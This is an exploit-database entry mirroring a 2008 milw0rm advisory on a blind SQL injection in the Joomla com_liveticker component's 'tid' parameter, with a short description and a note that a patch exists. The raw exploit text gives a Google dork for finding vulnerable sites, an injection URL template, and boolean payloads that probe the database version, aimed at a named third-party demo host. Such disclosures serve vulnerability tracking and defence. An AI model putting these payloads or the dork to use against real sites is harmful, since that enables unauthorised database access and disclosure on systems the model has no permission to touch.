header-logo
Suggest Exploit
vendor:
Live Ticker
by:
boom3rang
7.5
CVSS
HIGH
Blind SQL injection
89
CWE
Product Name: Live Ticker
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: YES
Related CWE: N/A
CPE: a:raven-worx:live_ticker
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component com_liveticker(tid) Blind SQL-injection

A Blind SQL injection vulnerability exists in Joomla Component com_liveticker(tid). An attacker can send a malicious SQL query to the vulnerable parameter 'tid' in order to execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate SQL queries, and disclose the contents of the database.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version.
Source

Exploit-DB raw data:

#############################################################
Joomla Component com_liveticker(tid) Blind SQL-injection
#############################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[~] Vulnerability :  Blind SQL injection 
#[~] Google Dork   :  inurl:com_liveticker 
--------------------------------------------------
#[!] Name          :  Live Ticker
#[!] Author        :  raven-worx
#[!] AuthorEmail   :  info@raven-worx.net
#[!] Version       :  1.0.0
###################################################

Example:
http://localHost/path/index.php?option=com_liveticker&task=viewticker&tid=[SQL]



LiveDEMO:


http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=4   >>(False)


http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=5   >>(True)




##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-12-24]

Navigation

Suggest Exploit

Services By CQR